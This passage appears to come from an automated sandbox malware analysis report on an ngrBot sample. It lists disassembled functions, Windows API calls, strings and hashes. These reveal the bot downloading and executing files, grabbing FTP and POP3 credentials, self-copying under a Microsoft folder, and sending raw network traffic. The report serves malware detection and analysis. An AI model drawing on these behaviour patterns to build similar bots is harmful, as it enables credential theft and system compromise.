                                                                  • LeaveCriticalSection.KERNEL32(003AB3C8), ref: 0036E478
                                                                  Strings
                                                                  • [d="%s"] Error downloading file [e="%d"], xrefs: 0036E405
                                                                  • [d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"], xrefs: 0036E36E
                                                                  • [d='%s"] Error getting application data path [e="%d"], xrefs: 0036E3F4
                                                                  • [d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d, xrefs: 0036E41C
                                                                  • bsod, xrefs: 0036E312
                                                                  • QUIT :%s, xrefs: 0036E2E3
                                                                  • [d="%s"] Error getting temporary filename. [e="%d"], xrefs: 0036E3D1
                                                                  • [d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s), xrefs: 0036E359
                                                                  • [d="%s"] Error writing download to "%S" [e="%d"], xrefs: 0036E383, 0036E3AE
                                                                  • rebooting, xrefs: 0036E2DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastSleep$File$CriticalMoveSectionstrtok$??3@DeleteEnterFreeHeapLeave_memicmplstrcmplstrcpylstrlenmemsetwvsprintf
                                                                  • String ID: QUIT :%s$[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]$[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)$[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d$[d="%s"] Error downloading file [e="%d"]$[d="%s"] Error getting temporary filename. [e="%d"]$[d="%s"] Error writing download to "%S" [e="%d"]$[d='%s"] Error getting application data path [e="%d"]$bsod$rebooting
                                                                  • API String ID: 4206007775-4213298338
                                                                  • Opcode ID: 70f21101d7a450ccd57037313d8d2b0f577cb8c6890245c20bf77ef52620b917
                                                                  • Instruction ID: 7b020ad2f94e195caf524fe1e0407d975ff556cf6965f68d8e00b3753fb0bb02
                                                                  • Opcode Fuzzy Hash: 70f21101d7a450ccd57037313d8d2b0f577cb8c6890245c20bf77ef52620b917
                                                                  • Instruction Fuzzy Hash: E681E3BAA00204BFDB23ABA8CC4AEBE777CEF46700F50C515F945D6285DB709944DA22
                                                                  Function 0040DDB0 Relevance: 56.3, APIs: 20, Strings: 12, Instructions: 281sleepstringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0044B3C8), ref: 0040DDCF
                                                                    • Part of subcall function 00409FF0: strtok.MSVCRT ref: 0040A013
                                                                    • Part of subcall function 00409FF0: strtok.MSVCRT ref: 0040A04F
                                                                  • strstr.MSVCRT ref: 0040DDF4
                                                                  • lstrlenA.KERNEL32(?), ref: 0040DE11
                                                                  • toupper.MSVCRT ref: 0040DE28
                                                                  • GetLastError.KERNEL32 ref: 0040DE68
                                                                  • GetLastError.KERNEL32 ref: 0040DE71
                                                                  • GetLastError.KERNEL32 ref: 0040DE7A
                                                                  • GetLastError.KERNEL32 ref: 0040DE83
                                                                  • Sleep.KERNEL32(00003A98), ref: 0040DEA8
                                                                  • Sleep.KERNEL32(000003E8), ref: 0040DF16
                                                                  • _stricmp.MSVCRT(?,00000000), ref: 0040DF3D
                                                                  • Sleep.KERNEL32(00000032), ref: 0040DF6A
                                                                  • GetLastError.KERNEL32([d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"],?,?,?,00000000), ref: 0040E021
                                                                  • GetLastError.KERNEL32 ref: 0040E059
                                                                  • GetLastError.KERNEL32([d="%s" s="%d bytes"] Error creating process "%S" [e="%d"],?,?,?,00000000), ref: 0040E037
                                                                    • Part of subcall function 0040BA00: memset.MSVCRT ref: 0040BA1E
                                                                    • Part of subcall function 0040BA00: wvsprintfA.USER32(00000000,00000000,00000000), ref: 0040BA42
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0040E0DD
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040E0EB
                                                                  • LeaveCriticalSection.KERNEL32(0044B3C8), ref: 0040E0F8
                                                                  Strings
                                                                  • [d="%s"] Error writing download to "%S" [e="%d"], xrefs: 0040E042
                                                                  • dlds, xrefs: 0040DE44, 0040DFA6
                                                                  • ERR, xrefs: 0040DFEC
                                                                  • [d="%s"] Error getting temporary filename. [e="%d"], xrefs: 0040E060
                                                                  • http://, xrefs: 0040DDEE
                                                                  • [d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"], xrefs: 0040E017
                                                                  • [d="%s" s="%d bytes"] Error creating process "%S" [e="%d"], xrefs: 0040E030
                                                                  • [d="%s"] Error downloading file [e="%d"], xrefs: 0040E08E
                                                                  • [d='%s"] Error getting application data path [e="%d"], xrefs: 0040E080
                                                                  • exe, xrefs: 0040DEE4
                                                                  • [d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s), xrefs: 0040DFFE
                                                                  • [d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d, xrefs: 0040E0A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$Sleep$CriticalSectionstrtok$??3@EnterFreeHeapLeave_stricmplstrlenmemsetstrstrtoupperwvsprintf
                                                                  • String ID: ERR$[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)$[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]$[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d$[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]$[d="%s"] Error downloading file [e="%d"]$[d="%s"] Error getting temporary filename. [e="%d"]$[d="%s"] Error writing download to "%S" [e="%d"]$[d='%s"] Error getting application data path [e="%d"]$dlds$exe$http://
                                                                  • API String ID: 3190375853-4059846736
                                                                  • Opcode ID: f986f074c990c97db4eed9869a16002373fbc8f9448da8be0168c0ee2a9dd183
                                                                  • Instruction ID: 3e91a635f220bf852c08f817978a574d76a59c4a97b8cc3da9307b122ab73dc0
                                                                  • Opcode Fuzzy Hash: f986f074c990c97db4eed9869a16002373fbc8f9448da8be0168c0ee2a9dd183
                                                                  • Instruction Fuzzy Hash: 0591B3B5E00205ABD710DBD5CC85ABFB3B8EB94704F20843AE905B72C5D778E945C6AE
                                                                  Function 0036DDB0 Relevance: 56.3, APIs: 20, Strings: 12, Instructions: 281sleepstringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(003AB3C8), ref: 0036DDCF
                                                                    • Part of subcall function 00369FF0: strtok.MSVCRT ref: 0036A013
                                                                    • Part of subcall function 00369FF0: strtok.MSVCRT ref: 0036A04F
                                                                  • strstr.MSVCRT ref: 0036DDF4
                                                                  • lstrlenA.KERNEL32(?), ref: 0036DE11
                                                                  • toupper.MSVCRT ref: 0036DE28
                                                                  • GetLastError.KERNEL32 ref: 0036DE68
                                                                  • GetLastError.KERNEL32 ref: 0036DE71
                                                                  • GetLastError.KERNEL32 ref: 0036DE7A
                                                                  • GetLastError.KERNEL32 ref: 0036DE83
                                                                  • Sleep.KERNEL32(00003A98), ref: 0036DEA8
                                                                  • Sleep.KERNEL32(000003E8), ref: 0036DF16
                                                                  • _stricmp.MSVCRT(?,00000000), ref: 0036DF3D
                                                                  • Sleep.KERNEL32(00000032), ref: 0036DF6A
                                                                  • GetLastError.KERNEL32([d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"],?,?,?,00000000), ref: 0036E021
                                                                  • GetLastError.KERNEL32 ref: 0036E059
                                                                  • GetLastError.KERNEL32([d="%s" s="%d bytes"] Error creating process "%S" [e="%d"],?,?,?,00000000), ref: 0036E037
                                                                    • Part of subcall function 0036BA00: memset.MSVCRT ref: 0036BA1E
                                                                    • Part of subcall function 0036BA00: wvsprintfA.USER32(00000000,00000000,00000000), ref: 0036BA42
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0036E0DD
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0036E0EB
                                                                  • LeaveCriticalSection.KERNEL32(003AB3C8), ref: 0036E0F8
                                                                  Strings
                                                                  • [d="%s"] Error downloading file [e="%d"], xrefs: 0036E08E
                                                                  • [d="%s" s="%d bytes"] Error creating process "%S" [e="%d"], xrefs: 0036E030
                                                                  • [d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"], xrefs: 0036E017
                                                                  • ERR, xrefs: 0036DFEC
                                                                  • [d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s), xrefs: 0036DFFE
                                                                  • http://, xrefs: 0036DDEE
                                                                  • dlds, xrefs: 0036DE44, 0036DFA6
                                                                  • [d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d, xrefs: 0036E0A5
                                                                  • [d='%s"] Error getting application data path [e="%d"], xrefs: 0036E080
                                                                  • [d="%s"] Error getting temporary filename. [e="%d"], xrefs: 0036E060
                                                                  • [d="%s"] Error writing download to "%S" [e="%d"], xrefs: 0036E042
                                                                  • exe, xrefs: 0036DEE4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$Sleep$CriticalSectionstrtok$??3@EnterFreeHeapLeave_stricmplstrlenmemsetstrstrtoupperwvsprintf
                                                                  • String ID: ERR$[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)$[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]$[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d$[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]$[d="%s"] Error downloading file [e="%d"]$[d="%s"] Error getting temporary filename. [e="%d"]$[d="%s"] Error writing download to "%S" [e="%d"]$[d='%s"] Error getting application data path [e="%d"]$dlds$exe$http://
                                                                  • API String ID: 3190375853-4059846736
                                                                  • Opcode ID: 677c5a195f558491eea96f594a5a79774bced9725ab31d434562c1e30fe814d5
                                                                  • Instruction ID: 4ea52c0c7527510d24600fc4040e728e0b46326845e4aec4a9f9b16a58c6a432
                                                                  • Opcode Fuzzy Hash: 677c5a195f558491eea96f594a5a79774bced9725ab31d434562c1e30fe814d5
                                                                  • Instruction Fuzzy Hash: 4391B479F00205AFD726DB98CC86EBFB7BCAB54700F15C018E50A9B289D7B5AE40C761
                                                                  Function 00407870 Relevance: 49.2, APIs: 11, Strings: 17, Instructions: 249stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00407898
                                                                  • lstrlenA.KERNEL32(-00000005,00000000,00000000,?,?,?,00000000,?), ref: 0040795D
                                                                  • _snprintf.MSVCRT ref: 0040797B
                                                                  • _snprintf.MSVCRT ref: 004079B7
                                                                  • lstrlenA.KERNEL32(0044A2B0,?,00000000,?), ref: 00407A5A
                                                                  • lstrlenA.KERNEL32(0044A4B0), ref: 00407A69
                                                                  • _snprintf.MSVCRT ref: 00407AD9
                                                                  • _stricmp.MSVCRT(0044A2B0,anonymous,00000000,000001FF,ftp://%s:%s@%s:%d,0044A2B0,0044A4B0,00000000,00000000), ref: 00407AE8
                                                                  • _snprintf.MSVCRT ref: 00407B66
                                                                    • Part of subcall function 00402460: GetProcessHeap.KERNEL32(?,004020DE,?), ref: 0040246C
                                                                    • Part of subcall function 00402460: HeapAlloc.KERNEL32(?,00000008,004020DE,?,004020DE,?), ref: 0040247E
                                                                  • lstrcpyA.KERNEL32(0044A2B0,00411335,?,00000000,?), ref: 00407BBC
                                                                  • lstrcpyA.KERNEL32(0044A4B0,00411335), ref: 00407BC8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _snprintf$lstrlen$Heaplstrcpy$AllocProcess_stricmpmemset
                                                                  • String ID: %s.%s (p='%S')$%s:%s@%s:%d$FEAT$LIST$PASS$PASV$STAT$TYPE$USER$anonymous$block$ftp://%s:%s@%s:%d$ftpgrab$ftplog$pop3://%s:%s@%s:%d$popgrab$poplog
                                                                  • API String ID: 389836911-2374598668
                                                                  • Opcode ID: 0e370dc052ecfbd7fb3f7bbf5e19c0d235bc1fe5bf087733f40848c40f85a7b1
                                                                  • Instruction ID: 4ec03147278e1debc2a34b89434d2914110906d41f31d0f6576211e9510b2703
                                                                  • Opcode Fuzzy Hash: 0e370dc052ecfbd7fb3f7bbf5e19c0d235bc1fe5bf087733f40848c40f85a7b1
                                                                  • Instruction Fuzzy Hash: 8D811B70F883556AFB20EF648C49FAF3A645B01708F19447BE904B23D1D6BCB994865F
                                                                  Function 00367870 Relevance: 49.2, APIs: 11, Strings: 17, Instructions: 249stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00367898
                                                                  • lstrlenA.KERNEL32(-00000005,00000000,00000000,?,?,?,00000000,?), ref: 0036795D
                                                                  • _snprintf.MSVCRT ref: 0036797B
                                                                  • _snprintf.MSVCRT ref: 003679B7
                                                                  • lstrlenA.KERNEL32(003AA2B0,?,00000000,?), ref: 00367A5A
                                                                  • lstrlenA.KERNEL32(003AA4B0), ref: 00367A69
                                                                  • _snprintf.MSVCRT ref: 00367AD9
                                                                  • _stricmp.MSVCRT(003AA2B0,anonymous,00000000,000001FF,ftp://%s:%s@%s:%d,003AA2B0,003AA4B0,00000000,00000000), ref: 00367AE8
                                                                  • _snprintf.MSVCRT ref: 00367B66
                                                                    • Part of subcall function 00362460: GetProcessHeap.KERNEL32(?,003620DE,?), ref: 0036246C
                                                                    • Part of subcall function 00362460: HeapAlloc.KERNEL32(?,00000008,003620DE,?,003620DE,?), ref: 0036247E
                                                                  • lstrcpyA.KERNEL32(003AA2B0,00371335,?,00000000,?), ref: 00367BBC
                                                                  • lstrcpyA.KERNEL32(003AA4B0,00371335), ref: 00367BC8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _snprintf$lstrlen$Heaplstrcpy$AllocProcess_stricmpmemset
                                                                  • String ID: %s.%s (p='%S')$%s:%s@%s:%d$FEAT$LIST$PASS$PASV$STAT$TYPE$USER$anonymous$block$ftp://%s:%s@%s:%d$ftpgrab$ftplog$pop3://%s:%s@%s:%d$popgrab$poplog
                                                                  • API String ID: 389836911-2374598668
                                                                  • Opcode ID: 7fc4ad55d98ef60cd8711143c3126e87d22817d074550dd0e271ddad913021d8
                                                                  • Instruction ID: 6c87243e6df62feda7b675a45a262f64d400c7ad8946784ab9d90273cf123207
                                                                  • Opcode Fuzzy Hash: 7fc4ad55d98ef60cd8711143c3126e87d22817d074550dd0e271ddad913021d8
                                                                  • Instruction Fuzzy Hash: BC815C72A487456ADB33AF68CC46FAE3AD8DB0271CF89C415F408A7299D7B49D80C653
                                                                  Function 00370910 Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 172sleepstringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00370930
                                                                  • GetProcessHeap.KERNEL32 ref: 0037093D
                                                                  • memset.MSVCRT ref: 0037095D
                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00370982
                                                                  • ShellExecuteA.SHELL32(00000000,OPEN,00000000,00000000,00000000,00000005), ref: 003709BF
                                                                    • Part of subcall function 003673E0: memset.MSVCRT ref: 00367401
                                                                    • Part of subcall function 003673E0: memset.MSVCRT ref: 00367419
                                                                    • Part of subcall function 003673E0: lstrlenA.KERNEL32(?), ref: 00367431
                                                                    • Part of subcall function 003673E0: _snprintf.MSVCRT ref: 00367449
                                                                    • Part of subcall function 003673E0: _vsnprintf.MSVCRT ref: 0036746B
                                                                    • Part of subcall function 003673E0: lstrlenA.KERNEL32(?), ref: 0036747A
                                                                  • GetTickCount.KERNEL32 ref: 003709CF
                                                                  • Sleep.KERNEL32 ref: 00370A05
                                                                  • OpenMutexA.KERNEL32 ref: 00370A17
                                                                  • GetLastError.KERNEL32 ref: 00370A27
                                                                  • GetLastError.KERNEL32 ref: 00370A2E
                                                                  • ExitProcess.KERNEL32 ref: 00370A32
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 00370A3D
                                                                  • _snprintf.MSVCRT ref: 00370A60
                                                                  • ExitProcess.KERNEL32 ref: 00370A79
                                                                  • ExitProcess.KERNEL32 ref: 00370A98
                                                                  • GetModuleFileNameW.KERNEL32(00000000,003AAFB0,00000208), ref: 00370ACC
                                                                  • wsprintfW.USER32 ref: 00370ADE
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,003AADA0,000000FF,003AAC50,00000104,00000000,00000000), ref: 00370B06
                                                                  • lstrcpynW.KERNEL32(003AB1B8,00000000,00000208), ref: 00370B13
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,003AB3E0,00000104,00000000,00000000), ref: 00370B2E
                                                                  • Sleep.KERNEL32(000009C4), ref: 00370B59
                                                                  • ExitProcess.KERNEL32 ref: 00370B70
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Exitmemset$lstrlen$ByteCharErrorFileLastModuleMultiNameSleepWide_snprintf$CountExecuteHeapMutexOpenShellTick_vsnprintflstrcpynwsprintf
                                                                  • String ID: %08x$%s\Microsoft\%s.exe$30e44aa1$OPEN$ngrBot$running
                                                                  • API String ID: 2173303953-2917108782
                                                                  • Opcode ID: 2a2dfe5072ed500c96ebfa8ca99d62f5fca3c6ba4df87e00ad974e162666ad5f
                                                                  • Instruction ID: fda1c0cb62378f9867686b1371f5ffeb9c9b2f334cf5d9e22c268556812758b4
                                                                  • Opcode Fuzzy Hash: 2a2dfe5072ed500c96ebfa8ca99d62f5fca3c6ba4df87e00ad974e162666ad5f
                                                                  • Instruction Fuzzy Hash: B451D876A80304BBE777A7B49C4BFDA3A6C9B45B11F00C454F70DEA1D2DAF455808B62
                                                                  Function 0040FE00 Relevance: 48.2, APIs: 32, Instructions: 223stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000,0041037C,?,004132E4,00000000,00000000,httpi), ref: 0040FE11
                                                                  • lstrlenA.KERNEL32(?), ref: 0040FE40
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 0040FE47
                                                                  • lstrlenA.KERNEL32(?), ref: 0040FE5E
                                                                  • lstrlenA.KERNEL32(?), ref: 0040FE72
                                                                  • lstrlenA.KERNEL32(?), ref: 0040FE7C
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000002), ref: 0040FE89
                                                                  • strtok.MSVCRT ref: 0040FEA2
                                                                  • lstrcpyA.KERNEL32(00000000,00411335), ref: 0040FEBB
                                                                  • lstrcatA.KERNEL32(00000000,004119DC), ref: 0040FECD
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040FEE4
                                                                  • _memicmp.MSVCRT ref: 0040FEEF
                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040FF0A
                                                                  • lstrlenA.KERNEL32(?), ref: 0040FF14
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 0040FF1F
                                                                  • lstrlenA.KERNEL32(?), ref: 0040FF33
                                                                  • lstrcatA.KERNEL32(00000000,00413328), ref: 0040FF4B
                                                                  • strstr.MSVCRT ref: 0040FF5C
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040FF65
                                                                  • lstrlenA.KERNEL32(?), ref: 0040FF6B
                                                                  • strncat.MSVCRT ref: 0040FF77
                                                                  • lstrcatA.KERNEL32(00000000,00412B54), ref: 0040FF85
                                                                  • lstrlenA.KERNEL32(?), ref: 0040FF8F
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 0040FF9A
                                                                  • lstrlenA.KERNEL32(?), ref: 0040FFAA
                                                                    • Part of subcall function 0040FD80: isalnum.MSVCRT ref: 0040FDAC
                                                                    • Part of subcall function 0040FD80: strchr.MSVCRT ref: 0040FDBE
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0040FFBE
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040FFCB
                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040FFDF
                                                                  • strtok.MSVCRT ref: 0040FFEC
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0041000F
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0041001C
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0041003C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$lstrcat$AllocFree$strtok$Process_memicmpisalnumlstrcpystrchrstrncatstrstr
                                                                  • String ID:
                                                                  • API String ID: 423345748-0
                                                                  • Opcode ID: ae5a00cf89488068b5b6207a80ca6a947a741f35cae490951e5afd2dcd30bff6
                                                                  • Instruction ID: ecdf31bace6aa1cfd498af2b81100673c9cff0bf93b629e0d4807f5436e9076f
                                                                  • Opcode Fuzzy Hash: ae5a00cf89488068b5b6207a80ca6a947a741f35cae490951e5afd2dcd30bff6
                                                                  • Instruction Fuzzy Hash: 75616075A00205BBDB209FA5DC85EFF7B78AF48705F10412AFA04E7390DA78DD8587A8
                                                                  Function 0036FE00 Relevance: 48.2, APIs: 32, Instructions: 223stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000,0037037C,?,003732E4,00000000,00000000,httpi), ref: 0036FE11
                                                                  • lstrlenA.KERNEL32(?), ref: 0036FE40
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 0036FE47
                                                                  • lstrlenA.KERNEL32(?), ref: 0036FE5E
                                                                  • lstrlenA.KERNEL32(?), ref: 0036FE72
                                                                  • lstrlenA.KERNEL32(?), ref: 0036FE7C
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000002), ref: 0036FE89
                                                                  • strtok.MSVCRT ref: 0036FEA2
                                                                  • lstrcpyA.KERNEL32(00000000,00371335), ref: 0036FEBB
                                                                  • lstrcatA.KERNEL32(00000000,003719DC), ref: 0036FECD
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036FEE4
                                                                  • _memicmp.MSVCRT ref: 0036FEEF
                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0036FF0A
                                                                  • lstrlenA.KERNEL32(?), ref: 0036FF14
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 0036FF1F
                                                                  • lstrlenA.KERNEL32(?), ref: 0036FF33
                                                                  • lstrcatA.KERNEL32(00000000,00373328), ref: 0036FF4B
                                                                  • strstr.MSVCRT ref: 0036FF5C
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036FF65
                                                                  • lstrlenA.KERNEL32(?), ref: 0036FF6B
                                                                  • strncat.MSVCRT ref: 0036FF77
                                                                  • lstrcatA.KERNEL32(00000000,00372B54), ref: 0036FF85
                                                                  • lstrlenA.KERNEL32(?), ref: 0036FF8F
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 0036FF9A
                                                                  • lstrlenA.KERNEL32(?), ref: 0036FFAA
                                                                    • Part of subcall function 0036FD80: isalnum.MSVCRT ref: 0036FDAC
                                                                    • Part of subcall function 0036FD80: strchr.MSVCRT ref: 0036FDBE
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0036FFBE
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036FFCB
                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0036FFDF
                                                                  • strtok.MSVCRT ref: 0036FFEC
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0037000F
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0037001C
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0037003C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$lstrcat$AllocFree$strtok$Process_memicmpisalnumlstrcpystrchrstrncatstrstr
                                                                  • String ID:
                                                                  • API String ID: 423345748-0
                                                                  • Opcode ID: 22e780dd61ca2fa5d9b77d1aabed33c7d822d9b4b6d541a8673515bc87deee7a
                                                                  • Instruction ID: f423e5c862619d82f76e769ad20f7700535f8f1fbd573f5aeeef182b51a3f8b6
                                                                  • Opcode Fuzzy Hash: 22e780dd61ca2fa5d9b77d1aabed33c7d822d9b4b6d541a8673515bc87deee7a
                                                                  • Instruction Fuzzy Hash: A8616176A00205BFDB229BA8DC85EBF777CAB48754F108119F908DB244DB78D981D7A0
                                                                  Function 004099B0 Relevance: 47.5, APIs: 25, Strings: 2, Instructions: 205networkstringsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 004099D5
                                                                  • memset.MSVCRT ref: 004099EF
                                                                  • WSAStartup.WS2_32(00000002,?), ref: 00409A00
                                                                    • Part of subcall function 00409300: inet_addr.WS2_32(n"@), ref: 00409308
                                                                    • Part of subcall function 00409300: gethostbyname.WS2_32(n"@), ref: 00409313
                                                                  • htons.WS2_32(00000050), ref: 00409A28
                                                                  • GetTickCount.KERNEL32(00000050,?), ref: 00409A3A
                                                                  • GetTickCount.KERNEL32 ref: 00409A4D
                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 00409A7B
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00409A96
                                                                  • connect.WS2_32(?,?,00000010), ref: 00409AB1
                                                                  • Sleep.KERNEL32(00000064,?,?,00000010,00000002,00000001,00000000), ref: 00409ABE
                                                                  • GetTickCount.KERNEL32 ref: 00409AC4
                                                                  • lstrcpyA.KERNEL32(00000000,X-a: b), ref: 00409AFE
                                                                  • lstrcpyA.KERNEL32(00000000,Connection: Close), ref: 00409B0C
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00409B0F
                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 00409B41
                                                                  • Sleep.KERNEL32(000003E8,?,00000000,00000000,00000000), ref: 00409B51
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00409B5E
                                                                  • GetTickCount.KERNEL32 ref: 00409B66
                                                                  • Sleep.KERNEL32(000009C4), ref: 00409B7F
                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 00409BBE
                                                                  • GetTickCount.KERNEL32(?,00000000,00000000,00000000), ref: 00409BD2
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00409BE4
                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 00409C1E
                                                                  • closesocket.WS2_32(?), ref: 00409C38
                                                                  • GetTickCount.KERNEL32(?,?,00000000,00000000,00000000), ref: 00409C43
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Sleeplstrlensend$lstrcpymemset$Startupclosesocketconnectgethostbynamehtonsinet_addrioctlsocketsocket
                                                                  • String ID: Connection: Close$X-a: b
                                                                  • API String ID: 1989272289-3524857483
                                                                  • Opcode ID: f35408606652e46185f76e06ca93f5c32642c9aae835a1c13394b773f809ad83
                                                                  • Instruction ID: 7cb26ec54ccc07fb4d2b8a21b45d65960398a2891f86cebd2f8e54a067ade358
                                                                  • Opcode Fuzzy Hash: f35408606652e46185f76e06ca93f5c32642c9aae835a1c13394b773f809ad83
                                                                  • Instruction Fuzzy Hash: 2F713071940254BBD710EBA1DD45FDEB378AB88704F10897AEA09F31D1D674AE81CF98
                                                                  Function 003699B0 Relevance: 47.5, APIs: 25, Strings: 2, Instructions: 205networkstringsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 003699D5
                                                                  • memset.MSVCRT ref: 003699EF
                                                                  • WSAStartup.WS2_32(00000002,?), ref: 00369A00
                                                                    • Part of subcall function 00369300: inet_addr.WS2_32(n"6), ref: 00369308
                                                                    • Part of subcall function 00369300: gethostbyname.WS2_32(n"6), ref: 00369313
